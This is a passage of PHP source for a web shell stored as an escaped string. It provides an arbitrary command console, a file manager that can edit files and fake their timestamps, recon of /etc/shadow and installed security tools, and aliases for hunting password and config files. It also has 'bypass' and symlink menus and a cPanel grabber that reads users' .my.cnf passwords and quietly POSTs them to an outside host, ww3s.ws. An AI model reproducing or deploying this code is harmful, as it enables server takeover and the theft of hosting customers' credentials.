@ini_get('open_basedir'));\r\n\tshowSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));\r\n\tshowSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));\r\n\tshowSecParam('cURL support', function_exists('curl_version')?'enabled':'no');\r\n\t\$temp=array();\r\n\tif(function_exists('mysql_get_client_info'))\r\n\t\t\$temp[] = \"MySql (\".mysql_get_client_info().\")\";\r\n\tif(function_exists('mssql_connect'))\r\n\t\t\$temp[] = \"MSSQL\";\r\n\tif(function_exists('pg_connect'))\r\n\t\t\$temp[] = \"PostgreSQL\";\r\n\tif(function_exists('oci_connect'))\r\n\t\t\$temp[] = \"Oracle\";\r\n\tshowSecParam('Supported databases', implode(', ', \$temp));\r\n\techo '<br>';\r\n\tif(\$GLOBALS['os'] == 'nix') {\r\n showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"/etc/\\\", \\\"passwd\\\")'>[view]</a>\":'no');\r\n showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"/etc/\\\", \\\"shadow\\\")'>[view]</a>\":'no');\r\n showSecParam('OS version', @file_get_contents('/proc/version'));\r\n showSecParam('Distr name', @file_get_contents('/etc/issue.net'));\r\n if(!\$GLOBALS['safe_mode']) {\r\n \$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\n \$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');\r\n \$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\n echo '<br>';\r\n \$temp=array();\r\n foreach (\$userful as \$\xe2\x96\x9f)\r\n if(which(\$\xe2\x96\x9f))\r\n \$temp[] = \$\xe2\x96\x9f;\r\n showSecParam('Userful', implode(', ',\$temp));\r\n \$temp=array();\r\n foreach (\$danger as \$\xe2\x96\x9f)\r\n if(which(\$\xe2\x96\x9f))\r\n \$temp[] = \$\xe2\x96\x9f;\r\n showSecParam('Danger', implode(', ',\$temp));\r\n \$temp=array();\r\n foreach (\$downloaders as \$\xe2\x96\x9f)\r\n if(which(\$\xe2\x96\x9f))\r\n \$temp[] = \$\xe2\x96\x9f;\r\n showSecParam('Downloaders', implode(', ',\$temp));\r\n echo '<br/>';\r\n showSecParam('HDD space', ex('df -h'));\r\n showSecParam('Hosts', @file_get_contents('/etc/hosts'));\r\n\t\t\t\tshowSecParam('Mount options', @file_get_contents('/etc/fstab'));\r\n }\r\n\t} else {\r\n\t\tshowSecParam('OS Version',ex('ver'));\r\n\t\tshowSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));\r\n\t\tshowSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));\r\n\t}\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\nfunction actionFilesTools() {\r\n\tif( isset(\$_POST['p1']) )\r\n\t\t\$_POST['p1'] = urldecode(\$_POST['p1']);\r\n\tif(@\$_POST['p2']=='download') {\r\n\t\tif(@is_file(\$_POST['p1']) && @is_readable(\$_POST['p1'])) {\r\n\t\t\tob_start(\"ob_gzhandler\", 4096);\r\n\t\t\theader(\"Content-Disposition: attachment; filename=\".basename(\$_POST['p1']));\r\n\t\t\tif (function_exists(\"mime_content_type\")) {\r\n\t\t\t\t\$type = @mime_content_type(\$_POST['p1']);\r\n\t\t\t\theader(\"Content-Type: \" . \$type);\r\n\t\t\t} else\r\n header(\"Content-Type: application/octet-stream\");\r\n\t\t\t\$fp = @fopen(\$_POST['p1'], \"r\");\r\n\t\t\tif(\$fp) {\r\n\t\t\t\twhile(!@feof(\$fp))\r\n\t\t\t\t\techo @fread(\$fp, 1024);\r\n\t\t\t\tfclose(\$fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @\$_POST['p2'] == 'mkfile' ) {\r\n\t\tif(!file_exists(\$_POST['p1'])) {\r\n\t\t\t\$fp = @fopen(\$_POST['p1'], 'w');\r\n\t\t\tif(\$fp) {\r\n\t\t\t\t\$_POST['p2'] = \"edit\";\r\n\t\t\t\tfclose(\$fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\thardHeader();\r\n\techo '<h1>File tools</h1><div class=content>';\r\n\tif( !file_exists(@\$_POST['p1']) ) {\r\n\t\techo 'File not exists';\r\n\t\thardFooter();\r\n\t\treturn;\r\n\t}\r\n\t\$uid = @posix_getpwuid(@fileowner(\$_POST['p1']));\r\n\tif(!\$uid) {\r\n\t\t\$uid['name'] = @fileowner(\$_POST['p1']);\r\n\t\t\$gid['name'] = @filegroup(\$_POST['p1']);\r\n\t} else \$gid = @posix_getgrgid(@filegroup(\$_POST['p1']));\r\n\techo '<span>Name:</span> '.htmlspecialchars(@basename(\$_POST['p1'])).' <span>Size:</span> '.(is_file(\$_POST['p1'])?viewSize(filesize(\$_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor(\$_POST['p1']).' <span>Owner/Group:</span> '.\$uid['name'].'/'.\$gid['name'].'<br>';\r\n\techo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime(\$_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime(\$_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime(\$_POST['p1'])).'<br><br>';\r\n\tif( empty(\$_POST['p2']) )\r\n\t\t\$_POST['p2'] = 'view';\r\n\tif( is_file(\$_POST['p1']) )\r\n\t\t\$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame');\r\n\telse\r\n\t\t\$m = array('Chmod', 'Rename', 'Touch');\r\n\tforeach(\$m as \$v)\r\n\t\techo '<a href=# onclick=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',\\''.strtolower(\$v).'\\')\">'.((strtolower(\$v)==@\$_POST['p2'])?'<b>[ '.\$v.' ]</b>':\$v).'</a> ';\r\n\techo '<br><br>';\r\n\tswitch(\$_POST['p2']) {\r\n\t\tcase 'view':\r\n\t\t\techo '<pre class=ml1>';\r\n\t\t\t\$fp = @fopen(\$_POST['p1'], 'r');\r\n\t\t\tif(\$fp) {\r\n\t\t\t\twhile( !@feof(\$fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread(\$fp, 1024));\r\n\t\t\t\t@fclose(\$fp);\r\n\t\t\t}\r\n\t\t\techo '</pre>';\r\n\t\t\tbreak;\r\n\t\tcase 'highlight':\r\n\t\t\tif( @is_readable(\$_POST['p1']) ) {\r\n\t\t\t\techo '<div class=ml1 style=\"background-color: #e1e1e1;color:black;\">';\r\n\t\t\t\t\$oRb = @highlight_file(\$_POST['p1'],true);\r\n\t\t\t\techo str_replace(array('<span ','</span>'), array('<font ','</font>'),\$oRb).'</div>';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase 'chmod':\r\n\t\t\tif( !empty(\$_POST['p3']) ) {\r\n\t\t\t\t\$perms = 0;\r\n\t\t\t\tfor(\$i=strlen(\$_POST['p3'])-1;\$i>=0;--\$i)\r\n\t\t\t\t\t\$perms += (int)\$_POST['p3'][\$i]*pow(8, (strlen(\$_POST['p3'])-\$i-1));\r\n\t\t\t\tif(!@chmod(\$_POST['p1'], \$perms))\r\n\t\t\t\t\techo 'Can\\'t set permissions!<br><script>document.mf.p3.value=\"\";</script>';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo '<script>p3_=\"\";</script><form onsubmit=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',null,this.chmod.value);return false;\"><input type=text name=chmod value=\"'.substr(sprintf('%o', fileperms(\$_POST['p1'])),-4).'\"><input type=submit value=\"submit\"></form>';\r\n\t\t\tbreak;\r\n\t\tcase 'edit':\r\n\t\t\tif( !is_writable(\$_POST['p1'])) {\r\n\t\t\t\techo 'File isn\\'t writeable';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty(\$_POST['p3']) ) {\r\n\t\t\t\t\$time = @filemtime(\$_POST['p1']);\r\n\t\t\t\t\$_POST['p3'] = substr(\$_POST['p3'],1);\r\n\t\t\t\t\$fp = @fopen(\$_POST['p1'],\"w\");\r\n\t\t\t\tif(\$fp) {\r\n\t\t\t\t\t@fwrite(\$fp,\$_POST['p3']);\r\n\t\t\t\t\t@fclose(\$fp);\r\n\t\t\t\t\techo 'Saved!<br><script>p3_=\"\";</script>';\r\n\t\t\t\t\t@touch(\$_POST['p1'],\$time,\$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo '<form onsubmit=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',null,\\'1\\'+this.text.value);return false;\"><textarea name=text class=bigarea>';\r\n\t\t\t\$fp = @fopen(\$_POST['p1'], 'r');\r\n\t\t\tif(\$fp) {\r\n\t\t\t\twhile( !@feof(\$fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread(\$fp, 1024));\r\n\t\t\t\t@fclose(\$fp);\r\n\t\t\t}\r\n\t\t\techo '</textarea><input type=submit value=\"submit\"></form>';\r\n\t\t\tbreak;\r\n\t\tcase 'hexdump':\r\n\t\t\t\$c = @file_get_contents(\$_POST['p1']);\r\n\t\t\t\$n = 0;\r\n\t\t\t\$h = array('00000000<br>','','');\r\n\t\t\t\$len = strlen(\$c);\r\n\t\t\tfor (\$i=0; \$i<\$len; ++\$i) {\r\n\t\t\t\t\$h[1] .= sprintf('%02X',ord(\$c[\$i])).' ';\r\n\t\t\t\tswitch ( ord(\$c[\$i]) ) {\r\n\t\t\t\t\tcase 0: \$h[2] .= ' '; break;\r\n\t\t\t\t\tcase 9: \$h[2] .= ' '; break;\r\n\t\t\t\t\tcase 10: \$h[2] .= ' '; break;\r\n\t\t\t\t\tcase 13: \$h[2] .= ' '; break;\r\n\t\t\t\t\tdefault: \$h[2] .= \$c[\$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t\$n++;\r\n\t\t\t\tif (\$n == 32) {\r\n\t\t\t\t\t\$n = 0;\r\n\t\t\t\t\tif (\$i+1 < \$len) {\$h[0] .= sprintf('%08X',\$i+1).'<br>';}\r\n\t\t\t\t\t\$h[1] .= '<br>';\r\n\t\t\t\t\t\$h[2] .= \"\\n\";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style=\"font-weight: normal;\"><pre>'.\$h[0].'</pre></span></td><td bgcolor=#000000><pre>'.\$h[1].'</pre></td><td bgcolor=#202832><pre>'.htmlspecialchars(\$h[2]).'</pre></td></tr></table>';\r\n\t\t\tbreak;\r\n\t\tcase 'rename':\r\n\t\t\tif( !empty(\$_POST['p3']) ) {\r\n\t\t\t\tif(!@rename(\$_POST['p1'], \$_POST['p3']))\r\n\t\t\t\t\techo 'Can\\'t rename!<br>';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie('<script>g(null,null,\"'.urlencode(\$_POST['p3']).'\",null,\"\")</script>');\r\n\t\t\t}\r\n\t\t\techo '<form onsubmit=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',null,this.name.value);return false;\"><input type=text name=name value=\"'.htmlspecialchars(\$_POST['p1']).'\"><input type=submit value=\"submit\"></form>';\r\n\t\t\tbreak;\r\n\t\tcase 'touch':\r\n\t\t\tif( !empty(\$_POST['p3']) ) {\r\n\t\t\t\t\$time = strtotime(\$_POST['p3']);\r\n\t\t\t\tif(\$time) {\r\n\t\t\t\t\tif(!touch(\$_POST['p1'],\$time,\$time))\r\n\t\t\t\t\t\techo 'Fail!';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo 'Touched!';\r\n\t\t\t\t} else echo 'Bad time format!';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo '<script>p3_=\"\";</script><form onsubmit=\"g(null,null,\\'' . urlencode(\$_POST['p1']) . '\\',null,this.touch.value);return false;\"><input type=text name=touch value=\"'.date(\"Y-m-d H:i:s\", @filemtime(\$_POST['p1'])).'\"><input type=submit value=\"submit\"></form>';\r\n\t\t\tbreak;\r\n\t\t/* (\xd0\xa1) 12.2015 mitryz */\r\n\t\tcase 'frame':\r\n\t\t\t\$frameSrc = substr(htmlspecialchars(\$GLOBALS['cwd']), strlen(htmlspecialchars(\$_SERVER['DOCUMENT_ROOT'])));\r\n\t\t\tif (\$frameSrc[0] != '/')\r\n\t\t\t\t\$frameSrc = '/' . \$frameSrc;\r\n\t\t\tif (\$frameSrc[strlen(\$frameSrc) - 1] != '/')\r\n\t\t\t\t\$frameSrc = \$frameSrc . '/';\r\n\t\t\t\$frameSrc = \$frameSrc . htmlspecialchars(\$_POST['p1']);\r\n\t\t\techo '<iframe width=\"100%\" height=\"900px\" scrolling=\"no\" src='.\$frameSrc.' onload=\"onload=height=contentDocument.body.scrollHeight\"></iframe>';\r\n\t\t\tbreak;\r\n\t}\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\nif(\$os == 'win')\r\n\t\$aliases = array(\r\n\t\t\"List Directory\" => \"dir\",\r\n \t\"Find index.php in current dir\" => \"dir /s /w /b index.php\",\r\n \t\"Find *config*.php in current dir\" => \"dir /s /w /b *config*.php\",\r\n \t\"Show active connections\" => \"netstat -an\",\r\n \t\"Show running services\" => \"net start\",\r\n \t\"User accounts\" => \"net user\",\r\n \t\"Show computers\" => \"net view\",\r\n\t\t\"ARP Table\" => \"arp -a\",\r\n\t\t\"IP Configuration\" => \"ipconfig /all\"\r\n\t);\r\nelse\r\n\t\$aliases = array(\r\n \t\t\"List dir\" => \"ls -lha\",\r\n\t\t\"list file attributes on a Linux second extended file system\" => \"lsattr -va\",\r\n \t\t\"show opened ports\" => \"netstat -an | grep -i listen\",\r\n \"process status\" => \"ps aux\",\r\n\t\t\"Find\" => \"\",\r\n \t\t\"find all suid files\" => \"find / -type f -perm -04000 -ls\",\r\n \t\t\"find suid files in current dir\" => \"find . -type f -perm -04000 -ls\",\r\n \t\t\"find all sgid files\" => \"find / -type f -perm -02000 -ls\",\r\n \t\t\"find sgid files in current dir\" => \"find . -type f -perm -02000 -ls\",\r\n \t\t\"find config.inc.php files\" => \"find / -type f -name config.inc.php\",\r\n \t\t\"find config* files\" => \"find / -type f -name \\\"config*\\\"\",\r\n \t\t\"find config* files in current dir\" => \"find . -type f -name \\\"config*\\\"\",\r\n \t\t\"find all writable folders and files\" => \"find / -perm -2 -ls\",\r\n \t\t\"find all writable folders and files in current dir\" => \"find . -perm -2 -ls\",\r\n \t\t\"find all service.pwd files\" => \"find / -type f -name service.pwd\",\r\n \t\t\"find service.pwd files in current dir\" => \"find . -type f -name service.pwd\",\r\n \t\t\"find all .htpasswd files\" => \"find / -type f -name .htpasswd\",\r\n \t\t\"find .htpasswd files in current dir\" => \"find . -type f -name .htpasswd\",\r\n \t\t\"find all .bash_history files\" => \"find / -type f -name .bash_history\",\r\n \t\t\"find .bash_history files in current dir\" => \"find . -type f -name .bash_history\",\r\n \t\t\"find all .fetchmailrc files\" => \"find / -type f -name .fetchmailrc\",\r\n \t\t\"find .fetchmailrc files in current dir\" => \"find . -type f -name .fetchmailrc\",\r\n\t\t\"Locate\" => \"\",\r\n \t\t\"locate httpd.conf files\" => \"locate httpd.conf\",\r\n\t\t\"locate vhosts.conf files\" => \"locate vhosts.conf\",\r\n\t\t\"locate proftpd.conf files\" => \"locate proftpd.conf\",\r\n\t\t\"locate psybnc.conf files\" => \"locate psybnc.conf\",\r\n\t\t\"locate my.conf files\" => \"locate my.conf\",\r\n\t\t\"locate admin.php files\" =>\"locate admin.php\",\r\n\t\t\"locate cfg.php files\" => \"locate cfg.php\",\r\n\t\t\"locate conf.php files\" => \"locate conf.php\",\r\n\t\t\"locate config.dat files\" => \"locate config.dat\",\r\n\t\t\"locate config.php files\" => \"locate config.php\",\r\n\t\t\"locate config.inc files\" => \"locate config.inc\",\r\n\t\t\"locate config.inc.php\" => \"locate config.inc.php\",\r\n\t\t\"locate config.default.php files\" => \"locate config.default.php\",\r\n\t\t\"locate config* files \" => \"locate config\",\r\n\t\t\"locate .conf files\"=>\"locate '.conf'\",\r\n\t\t\"locate .pwd files\" => \"locate '.pwd'\",\r\n\t\t\"locate .sql files\" => \"locate '.sql'\",\r\n\t\t\"locate .htpasswd files\" => \"locate '.htpasswd'\",\r\n\t\t\"locate .bash_history files\" => \"locate '.bash_history'\",\r\n\t\t\"locate .mysql_history files\" => \"locate '.mysql_history'\",\r\n\t\t\"locate .fetchmailrc files\" => \"locate '.fetchmailrc'\",\r\n\t\t\"locate backup files\" => \"locate backup\",\r\n\t\t\"locate dump files\" => \"locate dump\",\r\n\t\t\"locate priv files\" => \"locate priv\"\r\n\t);\r\nfunction actionConsole() {\r\n if(!empty(\$_POST['p1']) && !empty(\$_POST['p2'])) {\r\n prototype(md5(\$_SERVER['HTTP_HOST']).'stderr_to_out', true);\r\n \$_POST['p1'] .= ' 2>&1';\r\n } elseif(!empty(\$_POST['p1']))\r\n prototype(md5(\$_SERVER['HTTP_HOST']).'stderr_to_out', 0);\r\n\tif(isset(\$_POST['ajax'])) {\r\n\t\tprototype(md5(\$_SERVER['HTTP_HOST']).'ajax', true);\r\n\t\tob_start();\r\n\t\techo \"d.cf.cmd.value='';\\n\";\r\n\t\t\$temp = @iconv(\$_POST['charset'], 'UTF-8', addcslashes(\"\\n\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']),\"\\n\\r\\t\\'\\0\"));\r\n\t\tif(preg_match(\"!.*cd\\s+([^;]+)\$!\",\$_POST['p1'],\$match))\t{\r\n\t\t\tif(@chdir(\$match[1])) {\r\n\t\t\t\t\$GLOBALS['cwd'] = @getcwd();\r\n\t\t\t\techo \"c_='\".\$GLOBALS['cwd'].\"';\";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo \"d.cf.output.value+='\".\$temp.\"';\";\r\n\t\techo \"d.cf.output.scrollTop = d.cf.output.scrollHeight;\";\r\n\t\t\$temp = ob_get_clean();\r\n\t\techo strlen(\$temp), \"\\n\", \$temp;\r\n\t\texit;\r\n\t}\r\n if(empty(\$_POST['ajax'])&&!empty(\$_POST['p1']))\r\n\t\tprototype(md5(\$_SERVER['HTTP_HOST']).'ajax', 0);\r\n\thardHeader();\r\n echo \"<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>\";\r\n\techo '<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(d.cf.cmd.value==\\'clear\\'){d.cf.output.value=\\'\\';d.cf.cmd.value=\\'\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\'\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\'\\');} return false;\"><label><select name=alias>';\r\n\tforeach(\$GLOBALS['aliases'] as \$n => \$v) {\r\n\t\tif(\$v == '') {\r\n\t\t\techo '<optgroup label=\"-'.htmlspecialchars(\$n).'-\"></optgroup>';\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\techo '<option value=\"'.htmlspecialchars(\$v).'\">'.\$n.'</option>';\r\n\t}\r\n\techo '</select></label><input type=button onclick=\"add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\'\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\'\\');}\" value=\"submit\"> <nobr><input type=checkbox name=ajax value=1 '.(@\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty(\$_POST['p2'])||\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style=\"border-bottom:0;margin-top:5px;\" readonly>';\r\n\tif(!empty(\$_POST['p1'])) {\r\n\t\techo htmlspecialchars(\"\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']));\r\n\t}\r\n\techo '</textarea><table style=\"border:1px solid #000000;background-color:#000000;border-top:0px;\" cellpadding=0 cellspacing=0 width=\"100%\"><tr><td style=\"padding-left:4px; width:13px;\">\$</td><td><input type=text name=cmd style=\"border:0px;width:100%;\" onkeydown=\"kp(event);\"></td></tr></table>';\r\n\techo '</form></div><script>d.cf.cmd.focus();</script>';\r\n\thardFooter();\r\n}\r\nfunction actionbypas() {\r\n\thardHeader();\r\n\techo \"<center><h1>Bypass Tools</h1><div class=content><br>\";\r\n\t\r\n\techo\"<th><a href='#' onclick='g(\\\"passw\\\",null,\\\"s_name_\".(\$sort[1]?0:1).\"\\\")'> [ Bypass: /etc/passwd ] </a></th><p>\";\r\n\techo\"<th><a href='#' onclick='g(\\\"disable\\\",null,\\\"s_name_\".(\$sort[1]?0:1).\"\\\")'> [ Bypass: Disbaled Functions ] </a></th>\";\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\nfunction actionSym() {\r\n\thardHeader();\r\n\techo \"<center><h1>Symlink</h1><div class=content><br>\";\r\n\t\r\n\techo \"<br><center> <iframe src='?sym' width='900' height='300'></iframe></a>\";\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\nfunction actionpassw() {\r\n\thardHeader();\r\n\techo \"<center><h1>Bypass: /etc/passwd</h1><div class=content><br>\";\r\n\t\r\n\techo \"<br><center> <iframe src='?passwd' width='900' height='400'></iframe></a>\";\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\nfunction actiondisable() {\r\n\thardHeader();\r\n\techo \"<center><h1>Bypass: Disabled Functions</h1><div class=content><br>\";\r\n\techo \"<br><center> <iframe src='?disabled' width='900' height='300'></iframe></a>\";\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\nfunction actionPhp() {\r\n\thardHeader();\r\n\techo \"<center><h1>Grab Cpanel</h1><div class=content><br>\";\r\n\t @ini_set('display_errors', 0);\r\nfunction entre2v2(\$text, \$marqueurDebutLien, \$marqueurFinLien, \$i = 1) {\r\n \$ar0 = explode(\$marqueurDebutLien, \$text);\r\n \$ar1 = explode(\$marqueurFinLien, \$ar0[\$i]);\r\n return trim(\$ar1[0]);\r\n}\r\necho '<br><br>';\r\necho '<center>';\r\n\$d0mains = @file('/etc/named.conf');\r\n\$domains = scandir(\"/var/named\");\r\nif (\$domains or \$d0mains) {\r\n \$domains = scandir(\"/var/named\");\r\n if (\$domains) {\r\n echo \"<table align=center><tr><th valign=top class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>\";\r\n \$count = 1;\r\n \$dc = 0;\r\n \$list = scandir(\"/var/named\");\r\n foreach (\$list as \$domain) {\r\n if (strpos(\$domain, \".db\")) {\r\n \$domain = str_replace('.db', '', \$domain);\r\n \$owner = posix_getpwuid(fileowner(\"/etc/valiases/\" . \$domain));\r\n \$dirz = '/home/' . \$owner['name'] . '/.my.cnf';\r\n \$path = getcwd();\r\n if (is_readable(\$dirz)) {\r\n copy(\$dirz, '' . \$path . '/' . \$owner['name'] . '.txt');\r\n \$p = file_get_contents('' . \$path . '/' . \$owner['name'] . '.txt');\r\n \$password = entre2v2(\$p, 'password=\"', '\"');\r\n echo \"<tr><td valign=top style=border :2px solid white; width: 139px class=style2>\" . \$count++ . \"</td><td valign=top style= width: 139px; border :2px solid white class=style2 ><a href=http://\" . \$domain . \":2082 target=_blank>\" . \$domain . \"</a></td><td valign=top style= width: 139px; border: 2px solid white class=style2 >\" . \$owner['name'] . \"</td><td valign=top style= width: 139px; border: 2px solid white class=style2 >\" . \$password . \"</td><td valign=top style=border :2px solid white style=width: 139px><a href=\" . \$owner['name'] . \".txt target=_blank>Click Here</a></td></tr>\";\r\n \$dc++;\r\n \$success3 = \"http://\" . \$domain . \"|\" . \$owner['name'] . \"|\" . \$password . \"\r\n\";\r\n \$ch = curl_init();\r\n curl_setopt(\$ch, CURLOPT_URL, \"http://ww3s.ws/ok.php\");\r\n curl_setopt(\$ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');\r\n curl_setopt(\$ch, CURLOPT_POST, 1);\r\n curl_setopt(\$ch, CURLOPT_POSTFIELDS, \"result=\" . base64_encode(\$success3));\r\n curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n curl_setopt(\$ch, CURLOPT_HEADER, 1);\r\n \$buffer = curl_exec(\$ch);\r\n }\r\n }\r\n }\r\n echo '</table>';\r\n \$total = \$dc;\r\n echo '</center>';\r\n } else {\r\n \$d0mains = @file('/etc/named.conf');\r\n if (\$d0mains) {\r\n echo \"<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>\";\r\n \$count = 1;\r\n \$dc = 0;\r\n \$mck = array();\r\n foreach (\$d0mains as \$d0main) {\r\n if (@eregi('zone', \$d0main)) {\r\n preg_match_all('#zone \"(.*)\"#', \$d0main, \$domain);\r\n flush();\r\n if (strlen(trim(\$domain[1][0])) > 2) {\r\n \$mck[] = \$domain[1][0];\r\n }\r\n }\r\n }\r\n \$mck = array_unique(\$mck);\r\n \$usr = array();\r\n \$dmn = array();\r\n foreach (\$mck as \$o) {\r\n \$infos = @posix_getpwuid(fileowner(\"/etc/valiases/\" . \$o));\r\n \$usr[] = \$infos['name'];\r\n \$dmn[] = \$o;\r\n }\r\n array_multisort(\$usr, \$dmn);\r\n \$dt = file('/etc/passwd');\r\n \$passwd = array();\r\n foreach (\$dt as \$d) {\r\n \$r = explode(':', \$d);\r\n if (strpos(\$r[5], 'home')) {\r\n \$passwd[\$r[0]] = \$r[5];\r\n }\r\n }\r\n \$l = 0;\r\n \$j = 1;\r\n foreach (\$usr as \$r) {\r\n \$dirz = '/home/' . \$r . '/.my.cnf';\r\n \$path = getcwd();\r\n if (is_readable(\$dirz)) {\r\n copy(\$dirz, '' . \$path . '/' . \$r . '.txt');\r\n \$p = file_get_contents('' . \$path . '/' . \$r . '.txt');\r\n \$password = entre2v2(\$p, 'password=\"', '\"');\r\n echo \"<tr><td valign=top class=style2 style=width: 139px>\" . \$count++ . \"</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://\" . \$dmn[\$j - 1] . '/>' . \$dmn[\$j - 1] . ' </a></td><td valign=top class=style2 style=width: 139px>' . \$r . \"</td><td valign=top class=style2 style=width: 139px>\" . \$password . \"</td><td valign=top class=style2 style=width: 139px><a href='\" . \$r . \".txt' target='_blank'>Click Here</a></td></tr>\";\r\n \$dc++;\r\n flush();\r\n \$l = \$l ? 0 : 1;\r\n \$j++;\r\n }\r\n }\r\n }\r\n echo '</table>';\r\n \$total = \$dc;\r\n echo '<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = ' . \$total . '</h3><br />';\r\n echo '</center>';\r\n }\r\n} else {\r\n echo \"<div class=result><i><font color=#ff1111>ERROR</font><br><font color=#ff1111>/var/named</font> or <font color=#ff1111>etc/named.conf</font> Not Accessible!</i></div>\";\r\n}\r\n\techo\" </div>\";\r\n\thardFooter();\r\n}\r\nfunction actionReseller() {\r\n\thardHeader();\r\n\techo \"<center><h1>WHM & Reseller Finder</h1><div class=content><br>\";\r\n\techo \"<br><center> <iframe src='?reseller' width='900' height='470'></iframe></a>\";\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\nfunction actionFilesMan() {\r\n if (!empty (\$_COOKIE['f']))\r\n \$_COOKIE['f'] = @unserialize(\$_COOKIE['f']);\r\n\tif(!empty(\$_POST['p1'])) {\r\n\t\tswitch(\$_POST['p1']) {\r\n\t\t\tcase 'uploadFile':\r\n\t\t\t\tif ( is_array(\$_FILES['f']['tmp_name']) ) {\r\n\t\t\t\t\tforeach ( \$_FILES['f']['tmp_name'] as \$i => \$tmpName ) {\r\n if(!@move_uploaded_file(\$tmpName, \$_FILES['f']['name'][\$i])) {\r\n echo \"Can't upload file!\";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'mkdir':\r\n\t\t\t\tif(!@mkdir(\$_POST['p2']))\r\n\t\t\t\t\techo \"Can't create new dir\";\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'delete':\r\n\t\t\t\tfunction deleteDir(\$path) {\r\n\t\t\t\t\t\$path = (substr(\$path,-1)=='/') ? \$path:\$path.'/';\r\n\t\t\t\t\t\$dh = opendir(\$path);\r\n\t\t\t\t\twhile ( (\$\xe2\x96\x9f = readdir(\$dh) ) !== false) 